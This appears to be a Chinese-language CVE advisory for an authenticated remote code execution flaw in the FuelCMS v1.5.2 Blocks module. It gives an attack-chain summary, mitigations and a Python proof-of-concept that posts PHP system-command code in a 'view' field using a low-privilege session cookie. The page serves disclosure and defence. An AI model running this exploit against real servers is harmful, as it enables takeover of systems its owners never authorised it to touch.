CVE-2026-30460 CVSS 8.8 高危

CVE-2026-30460 FuelCMS Blocks模块远程代码执行漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30460

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Daylight Studio FuelCMS

漏洞概述

Daylight Studio FuelCMS v1.5.2版本中的Blocks模块被发现存在一个严重的远程代码执行漏洞。由于该模块在处理特定请求时存在不当授权缺陷，经过身份验证的攻击者可以利用此漏洞在服务器端执行任意系统命令，从而完全控制受影响的服务器。

技术细节

该漏洞的核心原理在于FuelCMS的Blocks模块未能正确实施访问控制检查。攻击者首先需要获取一个低权限的合法账户，随后利用该漏洞向受影响端点发送特制的恶意数据包。由于系统缺乏对用户操作权限的严格验证以及对输入数据的有效过滤，攻击者注入的恶意载荷会被服务器解析并执行。这种利用方式无需用户交互，且攻击复杂度低，成功利用后可导致机密性、完整性和可用性的全面丧失。

攻击链分析

STEP 1

侦察与信息收集

攻击者识别出目标站点使用的是FuelCMS v1.5.2，并定位到Blocks模块的入口点。

STEP 2

获取低权限账户

攻击者通过注册或社会工程学手段获取一个低权限的合法用户账户凭证。

STEP 3

构造并发送恶意请求

利用获取的凭证，攻击者向Blocks模块发送特制的HTTP POST请求，注入包含恶意PHP代码的载荷。

STEP 4

执行任意代码

服务器端解析恶意请求并执行注入的系统命令，攻击者从而获得服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: FuelCMS v1.5.2 - Blocks Module Authenticated RCE
# Date: 2026-04-07
# Exploit Author: Analyst
# Vendor Homepage: https://fuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/
# Version: 1.5.2

target_url = "http://target-site/index.php/fuel/blocks/select"

# Authentication cookie (low privilege user required)
cookies = {
    "fuel_cid": "valid_low_priv_session_cookie"
}

# Malicious payload to execute system command (e.g., 'id')
# The payload is injected into a parameter vulnerable to code execution
payload = {
    "name": "test_block",
    "view": "<?php system('id'); ?>",
    "submitted": "Save"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies)

    if response.status_code == 200:
        print("[+] Payload sent successfully!")
        # Check if command execution evidence exists in response
        if "uid=" in response.text:
            print("[+] Command execution successful!")
            print(response.text)
        else:
            print("[-] Target may be patched or payload failed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Daylight Studio FuelCMS 1.5.2

防御指南

临时缓解措施

在未升级补丁前，建议暂时禁用Blocks模块功能。管理员应检查系统日志是否存在异常的文件操作或命令执行记录，并通过Web应用防火墙（WAF）规则拦截针对该模块的异常请求参数。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30460
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30460
3 Details https://www.cvedetails.com/cve/CVE-2026-30460/
4 VulDB https://vuldb.com/cve/CVE-2026-30460
5 Link http://daylight.com
6 Link http://fuelcms.com
7 Link https://github.com/daylightstudio/FUEL-CMS/
8 Link https://pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf
9 Link https://pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表